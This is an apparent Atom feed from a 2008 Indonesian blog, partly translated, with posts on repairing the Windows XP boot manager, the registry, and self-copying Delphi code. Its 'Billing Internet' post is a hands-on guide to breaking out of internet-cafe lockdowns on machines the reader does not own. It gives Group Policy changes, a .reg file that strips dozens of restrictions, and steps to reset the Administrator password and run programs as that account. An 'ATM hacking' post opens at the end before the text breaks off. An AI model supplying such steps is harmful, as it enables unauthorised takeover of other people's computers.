type='html'>On a computer with more than one OS (operating system) installed, there is usually a boot manager for choosing which OS to use. On a computer with Windows 98/Me alongside Windows XP, a boot manager offers the choice of OS to start. For people who often switch OSes, this becomes a problem when the boot manager stops working properly and Windows XP can no longer be started, or when you want to install Windows 98 without losing XP (installing Windows 98 leaves the machine unable to boot into Windows XP). The following method can be used to install the boot manager so that the machine can boot into Windows XP. &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;Boot the computer from the Windows XP installer CD (as when installing Windows XP). After the initialization process, choose (R) Recovery. You will then be asked for the Administrator password. Once that succeeds, a prompt (C:\Windows&gt;) appears. Then type the commands:&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;span style="color: rgb(68, 107, 155);"&gt;fixmbr&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;&lt;span style="color: rgb(68, 107, 155);"&gt;bootcfg  /rebuild&lt;/span&gt;&lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt; &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;After that, exit using the &lt;span style="color: rgb(68, 107, 155);"&gt;exit &lt;/span&gt; command. &lt;/p&gt; &lt;p style="margin-top: 0px; margin-bottom: 0px;"&gt;Reboot your computer.  
The boot manager will be back as it was&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/8723958196394939485/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=8723958196394939485' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8723958196394939485'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/8723958196394939485'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/mengembalikan-boot-manager-windows-xp.html' title='Mengembalikan Boot Manager Windows XP'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-5914421474014799754</id><published>2008-03-29T07:28:00.000-07:00</published><updated>2008-03-29T07:42:57.367-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Registry tutorial I</title><content type='html'>&lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Windows is currently the most popular operating system for PCs, from Windows 95, 98 and NT to the recently launched Windows 2000 and Windows Millennium. One of Windows' strengths is its ease of use, for example ease of installation and configuration, and the plug and play feature for hardware.&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt; Of course, all of these configurations and settings are stored in the operating system, and to store this settings and configuration information Windows uses the registry. The registry is a database used to store all settings and information about hardware, software and various preferences for 32-bit Windows, including Windows 95, 98, NT, Millennium and 2000. For example, when someone changes a file association or installs a program, the changed settings are written to the registry. Other examples are disabling Display Properties and hiding various menus on the Start menu. 
&lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;Besides storing information for the Windows operating system itself, the registry is also used to store settings and configuration information for applications or programs. WinZip, for example, uses the registry to store toolbar information, the application used to open files (viewer), the user name, the serial number, and so on. &lt;/span&gt;&lt;/p&gt; &lt;p align="left"&gt;&lt;span style="font-family:Verdana, Arial, Helvetica;font-size:85%;"&gt;The registry is kept in two hidden files, user.dat and system.dat, located in the Windows directory on Win 95/98/Me and in the Windows/System32/Config directory on Windows NT. 
In addition to the registry (system.dat and user.dat), Windows also stores certain settings in the files msdos.sys, system.ini and win.ini.&lt;/span&gt;&lt;/p&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/5914421474014799754/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=5914421474014799754' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5914421474014799754'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/5914421474014799754'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/tutorial-registry-i.html' title='tutorial Registry I'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-6969141645839349302</id><published>2008-03-28T00:06:00.000-07:00</published><updated>2008-03-28T00:20:12.250-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Tips dan trik komputer'/><title type='text'>Creating a Program That Can Copy Itself</title><content type='html'>&lt;p style="margin: 0cm 7.5pt 0.0001pt; text-align: center; line-height: 
200%;" align="center"&gt;&lt;b&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;CREATING A PROGRAM THAT CAN COPY ITSELF AUTOMATICALLY&lt;/span&gt;&lt;/b&gt;  &lt;/p&gt; &lt;p style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;Program source code in DELPHI. This program automatically copies itself to the desired location.. yeah, kind of like a worm.. ;) Thanks to CodeMaker .. Great work man ;)&lt;/span&gt;&lt;/p&gt;   &lt;p style="margin: 0cm 6.75pt 0.0001pt; line-height: 200%;"&gt;&lt;span style="font-size: 9pt; line-height: 200%; font-family: &amp;quot;Courier New&amp;quot;;"&gt;   &lt;/span&gt;&lt;/p&gt; &lt;p&gt;  &lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;var&lt;br /&gt;Form1: TForm1;&lt;br /&gt;ExeString: String;&lt;br /&gt;&lt;br /&gt;implementation&lt;br /&gt;&lt;br /&gt;{$R *.DFM}&lt;br /&gt;///////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Extract(A,B: String;Var C,D: String);&lt;br /&gt;Var&lt;br /&gt;E,F: Integer;&lt;br /&gt;begin&lt;br /&gt;if Pos(uppercase(A),C) &gt; 0 then&lt;br /&gt;begin&lt;br /&gt;E := Pos(uppercase(A),C)+length(A);&lt;br /&gt;F := Pos(uppercase(B),C);&lt;br /&gt;D := Copy(C,E,F-E);&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Exe2String(var A:String);&lt;br /&gt;Var&lt;br /&gt;ExeStream: TFileStream;&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;begin&lt;br /&gt;ExeStream:=TFileStream.Create(Application.ExeName,fmOpenRead or&lt;br /&gt;fmShareDenyNone);&lt;br /&gt;Try&lt;br /&gt;SetLength(A, ExeStream.Size);&lt;br 
/&gt;ExeStream.ReadBuffer(Pointer(A)^, ExeStream.Size);&lt;br /&gt;Finally&lt;br /&gt;ExeStream.Free;&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;///////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;procedure Delay(ms : longint);&lt;br /&gt;var&lt;br /&gt;TheTime : LongInt;&lt;br /&gt;begin&lt;br /&gt;TheTime := GetTickCount + ms;&lt;br /&gt;while GetTickCount &lt; TheTime do&lt;br /&gt;Application.ProcessMessages;&lt;br /&gt;end;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;////////////////////////////////////////////////////////////////////////////////&lt;br /&gt;procedure TForm1.FormCreate(Sender: TObject);&lt;br /&gt;Var&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;name,C,Temp: String;&lt;br /&gt;D,E: integer;&lt;br /&gt;begin&lt;br /&gt;exe2String(ExeString);////////////////////////////Get entire exe file from HD&lt;br /&gt;//and store in global variable&lt;br /&gt;//ExeString.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if pos(uppercase('soname'),exestring) &gt; 0 then //Check if exe contains a&lt;br /&gt;begin //users name already and if&lt;br /&gt;delay(500); //it does then see if the&lt;br /&gt;if pos('_clone',application.exename) = 0 then //running exe is a temporary&lt;br /&gt;begin //clone program.. if it is not&lt;br /&gt;name := application.exename; //a clone then attempt to delete&lt;br /&gt;Insert('_clone',name,(length(name)-3)); //any clone that may be in the&lt;br /&gt;deletefile(name); //applications directory. 
This&lt;br /&gt;end; //ensures that no clone will&lt;br /&gt;//ever remain after exe has&lt;br /&gt;//been customized.....&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;edit1.visible := false; ///////////////////////It has been determined that&lt;br /&gt;form1.color := $00c6aa84; //the running exe has already been&lt;br /&gt;form1.height := 300; //customized..so alter the exe's&lt;br /&gt;//appearance to reflect that fact&lt;br /&gt;//This is where you put any setup code you want&lt;br /&gt;//to run when it has been determined that the exe&lt;br /&gt;//has ALREADY been modified! Code to check for a&lt;br /&gt;//valid username+key,to alter the exe's appearance&lt;br /&gt;//or whatever you want to do to change the way the&lt;br /&gt;//now modified prog is to act should be done HERE!&lt;br /&gt;end;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;//////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;//The code below runs IF it is determined that the currently running exe is&lt;br /&gt;//a temporary clone program..... this code will delete the original exe file&lt;br /&gt;//from the HD and then save a new copy of itself to the HD with the original&lt;br /&gt;//exe name...DO NOT REMOVE THE delay(500) line! The program will fail sometimes&lt;br /&gt;//if you do! Since the currently running exe is a clone that means it already&lt;br /&gt;//has been modified and in fact is identical to the final exe that it is saving&lt;br /&gt;//to disk with the original name... as soon as the new exe is saved to disk&lt;br /&gt;//this code runs it...then immediately terminates itself .. 
the clone commits&lt;br /&gt;//hari kiri :-) and since every time a customized exe starts up it attempts&lt;br /&gt;//to delete it's clone from the current directory this clones remaining life&lt;br /&gt;//on disk is limited to 1/2 second......&lt;br /&gt;if pos('_CLONE',uppercase(application.exename)) &lt;&gt; 0 then&lt;br /&gt;begin&lt;br /&gt;delay(500);&lt;br /&gt;name := application.exename;&lt;br /&gt;Delete(name,length(name)-9,6);&lt;br /&gt;if deletefile(name) then&lt;br /&gt;begin&lt;br /&gt;MyStream := TMemoryStream.Create;&lt;br /&gt;try&lt;br /&gt;MyStream.WriteBuffer(Pointer(ExeString)^, Length(ExeString));&lt;br /&gt;MyStream.savetofile(name);&lt;br /&gt;finally&lt;br /&gt;MyStream.Free;&lt;br /&gt;ShellExecute(Handle, 'open',&lt;br /&gt;pchar(name), nil, nil, SW_SHOWNORMAL);&lt;br /&gt;application.terminate&lt;br /&gt;end;&lt;br /&gt;end&lt;br /&gt;else showmessage(name+' not found');//this displays if it was determined that&lt;br /&gt;//the running exe is a clone but for some&lt;br /&gt;//crazy reason the original exe file is&lt;br /&gt;//not found in the current directory :-(&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;end;&lt;br /&gt;&lt;br /&gt;//The code below extracts the user name string from the exe file&lt;br /&gt;//and displays it as a caption...but you could retrieve whatever&lt;br /&gt;//data you had stored and do whatever you want with it :-)&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;if Pos(uppercase('soname'),exestring) &gt; 0 then //Extract Name string&lt;br /&gt;begin //from exe file and&lt;br /&gt;Extract('soname','eoname',ExeString,Temp); //display as the button&lt;br /&gt;SpeedButton1.Caption := 'Program is Registered to '+Temp;//caption :-)&lt;br /&gt;end;&lt;br /&gt;end;&lt;br /&gt;////////////////////////////////////////////////////&lt;/span&gt;&lt;/p&gt;&lt;p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;//The code in the SpeedButton event handler below modifies the string held in&lt;br /&gt;//the global 
variable ExeString...this string contains the entire exe file as&lt;br /&gt;//string data...it modifies ExeString by adding data to it's end... the data is&lt;br /&gt;//held between the demarcators 'SONAME' and 'EONAME' these mark off the data&lt;br /&gt;//and make it possible to find it later and extract it from the running exe&lt;br /&gt;//After ExeString is modified it is saved to a new file in the current directory&lt;br /&gt;//with the exe's name plus '_clone' so if the exe name is myprog.exe the clone&lt;br /&gt;//that is saved will be myprog_clone.exe... as soon as the clone exe is saved&lt;br /&gt;//to disk the program runs it and then terminates itself :-)&lt;br /&gt;//The reason uppercase('soname') is used is because the program would find the&lt;br /&gt;//data 'SONAME' at the wrong point in the exe file if you did not do it this way&lt;br /&gt;//ditto for uppercase('eoname') this is an IMPORTANT POINT!&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;procedure TForm1.SpeedButton1Click(Sender: TObject);&lt;br /&gt;var&lt;br /&gt;MyStream: TMemoryStream;&lt;br /&gt;MyFile,newname: string;&lt;br /&gt;A,B: Integer;&lt;br /&gt;begin&lt;br /&gt;If Speedbutton1.Caption &lt;&gt; 'Enter Your Name Below Then Click Here To Customize Exe' then&lt;br /&gt;begin&lt;br /&gt;exit;&lt;br /&gt;end;&lt;br /&gt;begin&lt;br /&gt;if edit1.text = '' then&lt;br /&gt;begin&lt;br /&gt;showmessage('Please enter a name in the Edit Box!');&lt;br /&gt;exit;&lt;br /&gt;end;&lt;br /&gt;MyStream := TMemoryStream.Create;&lt;br /&gt;try&lt;br /&gt;//in line below you tack on the new data :-)&lt;br /&gt;ExeString := ExeString + uppercase('soname') + Edit1.Text&lt;br /&gt;+ uppercase('eoname');&lt;br /&gt;&lt;br /&gt;MyStream.Clear;&lt;br /&gt;MyStream.WriteBuffer(Pointer(ExeString)^,&lt;br /&gt;Length(ExeString));//string 2 stream&lt;br /&gt;&lt;br /&gt;newname := application.exename; //change name to make it a clone!&lt;br 
/&gt;Insert('_clone',newname,length(application.exename)-3);&lt;br /&gt;&lt;br /&gt;MyStream.savetofile(newname);//save stream to file as a temporary clone!&lt;br /&gt;finally&lt;br /&gt;MyStream.Free;&lt;br /&gt;end;&lt;br /&gt;&lt;br /&gt;ShellExecute(Handle, 'open', //run the clone you just saved!&lt;br /&gt;pchar(newname), nil, nil, SW_SHOWNORMAL);&lt;br /&gt;&lt;br /&gt;application.terminate; //die little proggie die! :-)&lt;br /&gt;end;&lt;br /&gt;end; //closes the procedure's outer begin&lt;/span&gt;&lt;br /&gt;&lt;/p&gt;&lt;span style="font-size: 9pt; font-family: &amp;quot;Courier New&amp;quot;;"&gt;&lt;/span&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/6969141645839349302/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=6969141645839349302' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6969141645839349302'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/6969141645839349302'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/membuat-program-yang-dapat-mengcopy.html' title='Membuat Program yang dapat mengcopy dirinya sendiri'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-3520559210466233050</id><published>2008-03-26T22:26:00.000-07:00</published><updated>2008-03-31T20:24:26.057-07:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Hacking'/><title type='text'>Billing Internet</title><content type='html'>&lt;span style=""&gt;We often go to internet cafes that lock down all kinds of access: Windows Explorer can't be opened,&lt;br /&gt;right-clicking on the desktop doesn't work, and right-clicking on a folder doesn't work either... how sad is that... especially for me, since I'm used to the Windows XP shortcuts, for example opening Windows Explorer:&lt;br /&gt;Win +E, opening Run: Win +R, searching for files on the hard disk: Win +F, where the Win key sits between&lt;br /&gt;the Ctrl key and the Alt key. Want to know how... here, give it a try...&lt;br /&gt;I actually tried this method a long time ago and it turned out to work (tested on my own computer and at several internet cafes that use Billing Explorer). Apologies to the makers of Billing Explorer... without further ado, let's get straight to it...&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; First, open GPEdit.msc&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;1. If right-clicking on the desktop doesn't work&lt;br /&gt;Open GPEdit.msc&lt;br /&gt;Go to [User Configuration/Administrative Templates/Desktop]&lt;br /&gt;- Disable (Hide and disable all items on the desktop)&lt;br /&gt;&lt;br /&gt;If My Computer is missing&lt;br /&gt;- Disable (Remove My Computer icon on the Desktop)&lt;br /&gt;&lt;br /&gt;2. 
If you want to change the taskbar and Start menu properties&lt;br /&gt;go to [User Configuration/Administrative Templates/Start Menu and Taskbar]&lt;br /&gt;- Disable (Prevent changes to Taskbar and Start Menu Settings)&lt;br /&gt;&lt;br /&gt;If the Run menu does not appear&lt;br /&gt;- Disable (Remove Run menu from Start Menu)&lt;br /&gt;&lt;br /&gt;If the taskbar's right-click menu does not appear&lt;br /&gt;- Disable (Remove access to the context menus for the taskbar)&lt;br /&gt;3. If the Control Panel cannot be accessed&lt;br /&gt;Go to [User Configuration/Administrative Templates/Control Panel]&lt;br /&gt;- Disable (Prohibit access to the Control Panel)&lt;br /&gt;&lt;br /&gt;4. If the Command Prompt cannot be accessed&lt;br /&gt;Go to [User Configuration/Administrative Templates/System]&lt;br /&gt;- Disable (Prevent access to the command prompt)&lt;br /&gt;&lt;br /&gt;If the Registry Editor cannot be accessed&lt;br /&gt;- Disable (Prevent access to registry editing tools)&lt;br /&gt;&lt;br /&gt;5. If Task Manager cannot be accessed&lt;br /&gt;Go to [User Configuration/Administrative Templates/System/Ctrl+Alt+Del Options]&lt;br /&gt;- Disable (Remove Task Manager)&lt;br /&gt;&lt;br /&gt;6. 
If Folder Options does not appear in Windows Explorer&lt;br /&gt;Go to [User Configuration/Administrative Templates/Windows Component/Windows Explorer]&lt;br /&gt;- Disable (Remove these Folder Options menu item from the Tools menu)&lt;br /&gt;&lt;br /&gt;If the Windows key does not work&lt;br /&gt;- Disable (Turn off Windows+X hotkeys)&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; Once GPEdit.msc has been opened, open the Registry Tools&lt;br /&gt;as follows:&lt;br /&gt;C:\Windows\System32\regedit.exe &lt;-- double click --- or --- C:\Windows\regedit.exe &lt;-- double click  &lt;/span&gt;&lt;span style=""&gt;Regedit4&lt;br /&gt;&lt;br /&gt;[HKEY_LOCAL_MACHINE\Software\ResearchMachines\NOATTRIB.VXD]&lt;br /&gt;"loadvxd"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]&lt;br /&gt;"NoDrives"=dword:00000000&lt;br /&gt;"LinkResolveIgnoreLinkInfo"=dword:00000000&lt;br /&gt;"NoFolderOptions"=dword:00000000&lt;br /&gt;"ClearRecentDocsOnExit"=dword:00000000&lt;br /&gt;"NoTrayContextMenu"=dword:00000000&lt;br /&gt;"EnforceShellExtensionSecurity"=dword:00000000&lt;br /&gt;"NoPrinterTabs"=dword:00000000&lt;br /&gt;"NoDeletePrinter"=dword:00000000&lt;br /&gt;"NoAddPrinter"=dword:00000000&lt;br /&gt;"NoRun"=dword:00000000&lt;br /&gt;"NoSetFolders"=dword:00000000&lt;br /&gt;"NoSetTaskbar"=dword:00000000&lt;br /&gt;"NoClose"=dword:00000000&lt;br /&gt;"NoViewContextMenu"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]&lt;br /&gt;"DisableRegistryTools"=dword:00000000&lt;br /&gt;"NoDispScrSavPage"=dword:00000000&lt;br /&gt;"NoDispAppearancePage"=dword:00000000&lt;br /&gt;"NoDispSettingsPage"=dword:00000000&lt;br /&gt;"NoAdminPage"=dword:00000000&lt;br /&gt;"NoProfilePage"=dword:00000000&lt;br /&gt;"NoDevMgrPage"=dword:00000000&lt;br /&gt;"NoConfigPage"=dword:0000000&lt;br 
/&gt;"NoFileSysPage"=dword:00000000&lt;br /&gt;"NoDispCPL"=dword:00000000&lt;br /&gt;"NoDispBackgroundPage"=dword:00000000&lt;br /&gt;"NoVirtMemPage"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\Network]&lt;br /&gt;"NoFileSharingControl"=dword:00000000&lt;br /&gt;"NoPrintSharingControl"=dword:00000000&lt;br /&gt;"NoNetSetup"=dword:00000000&lt;br /&gt;"NoNetSetupIDPage"=dword:00000000&lt;br /&gt;"NoNetSetupSecurityPage"=dword:00000000&lt;br /&gt;"NoEntireNetwork"=dword:00000000&lt;br /&gt;"NoWorkgroupContents"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\WinOldApp]&lt;br /&gt;"NoRealMode"=dword:00000000&lt;br /&gt;"Disable"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\ActiveDesktop]&lt;br /&gt;"NoHTMLWallPaper"=dword:00000000&lt;br /&gt;"NoChangingWallPaper"=dword:00000000&lt;br /&gt;"NoCloseDragDropBands"=dword:00000000&lt;br /&gt;"NoMovingBands"=dword:00000000&lt;br /&gt;"NoAddingComponents"=dword:00000000&lt;br /&gt;"NoDeletingComponents"=dword:00000000&lt;br /&gt;"NoEditingComponents"=dword:00000000&lt;br /&gt;"NoClosingComponents"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer]&lt;br /&gt;"NoFolderOptions"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\System]&lt;br /&gt;"DisableCMD"=dword:00000000&lt;br /&gt;"DisableRegistryTools"=dword:00000000&lt;br /&gt;&lt;br /&gt;[HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Policies\Advanced]&lt;br /&gt;"Hidden"=dword:00000000&lt;br /&gt;"HideFileExt"=dword:00000000&lt;br /&gt;"ShowSuperHidden"=dword:00000000&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style=""&gt;==&gt; Once regedit.exe has been opened, change the administrator password &lt;-- (this is the part you've been waiting for) as follows: 
C:\Windows\System32\compmgmt.msc &lt;-- double Click  &lt;/span&gt;&lt;span style=""&gt;Pilih: - Computer Management (Local)/System Tools/Local Users and Groups/User&lt;br /&gt;&lt;br /&gt;- Klik kanan Administrator -&gt; Set Password&lt;br /&gt;&lt;br /&gt;- Ketik New Password: **********&lt;br /&gt;Confirm Password: **********&lt;br /&gt;&lt;br /&gt;Selesai deh!!!!!!!!!!!!!&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style=""&gt;Jika tidak bisa sama sekali klik kanan di Windows Explorer masih ada trik tertentu&lt;br /&gt;caranya:&lt;br /&gt;- Masuk ke Folder misalnya: C:/Windows/System32&lt;br /&gt;- Trus klik salah satu file dalam folder itu&lt;br /&gt;misalnya: TaskMgr.exe&lt;br /&gt;- Kemudian klik menu File pada Win Explorer&lt;br /&gt;- Run as...&lt;br /&gt;- Klik The following user -&gt; Masukkan passwordnya&lt;br /&gt;Username: Administrator&lt;br /&gt;Password: ********&lt;br /&gt;- Selesai&lt;br /&gt;NB: Cara ini dilakukan jika kita sudah mendapatkan password administrator seperti yang telah&lt;br /&gt;kita pelajari di atas. jika semua cara di atas masih ngga bisa jg berarti masih ada cara&lt;br /&gt;lain silakan anda temukan sendiri, selamat mencoba&lt;br /&gt;&lt;br /&gt;Contoh lain2nya dibawah ini...........&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;1. Membuka MSConfig dari Windows Explorer&lt;br /&gt;Caranya:&lt;br /&gt;C:\WINDOWS\pchealth\helpctr\binaries\MSConfig.exe&lt;br /&gt;&lt;br /&gt;2. Membuka Sysedit dari Windows Explorer&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\Sysedit.exe&lt;br /&gt;&lt;br /&gt;3. Membuka Task Manager&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\taskmgr.exe&lt;br /&gt;&lt;br /&gt;4. Membuka Services.msc&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\services.msc&lt;br /&gt;&lt;br /&gt;5. 
Membuka Disk Management System (Melihat Partisi Harddisk)&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\diskmgmt.msc&lt;br /&gt;&lt;br /&gt;6. Membuka Computer Management Services&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\compmgmt.msc&lt;br /&gt;&lt;br /&gt;7. Membuka Shortcut to desktop&lt;br /&gt;Caranya:&lt;br /&gt;C:\Windows\System32\Show Desktop&lt;br /&gt;&lt;br /&gt;8. Membuka Defragment&lt;br /&gt;Caranya&lt;br /&gt;C:\Windows\System32\dfrg.msc&lt;br /&gt;&lt;!--[if !supportLineBreakNewLine]--&gt;&lt;br /&gt;&lt;!--[endif]--&gt;&lt;/span&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/8591117055296439835-3520559210466233050?l=enaq.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://enaq.blogspot.com/feeds/3520559210466233050/comments/default' title='Poskan Komentar'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=8591117055296439835&amp;postID=3520559210466233050' title='0 Komentar'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3520559210466233050'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/8591117055296439835/posts/default/3520559210466233050'/><link rel='alternate' type='text/html' href='http://enaq.blogspot.com/2008/03/billing-internet.html' title='Billing Internet'/><author><name>Deni's Blog</name><uri>http://www.blogger.com/profile/08351452297355526383</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='33' height='11' 
src='http://bp0.blogger.com/_ODxpL5cDIW8/R_GyiGm5q3I/AAAAAAAAACg/cN72rF5eUzo/S220/08012006(004)_filtered.jpg'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-8591117055296439835.post-5149780704297944142</id><published>2008-03-26T21:41:00.001-07:00</published><updated>2008-03-31T20:25:28.427-07:00</updated><title type='text'>ATM hacking</title><content type='html'>&lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;What is an ATM machine?&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;It stands for Auto Teller Machine ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;A machine that could be called a mini bank .. Hehehe ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;A machine whose what and how probably need no further explanation, since I think everyone already knows about it ..&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;What is clear is that with this machine you can withdraw money without having to go to the bank and do a lot of other things that I personally find tiring .. filling in forms and whatnot .. Exhausting, dude xD~~&lt;/span&gt;&lt;/p&gt;  &lt;p style=""&gt;&lt;span style="color: rgb(0, 51, 51);font-family:Verdana;font-size:10;"  &gt;Now, there is a rumor that comes up often .. Can an ATM actually be hacked??!&lt;/span&gt;&lt;/p&gt;  &lt;p 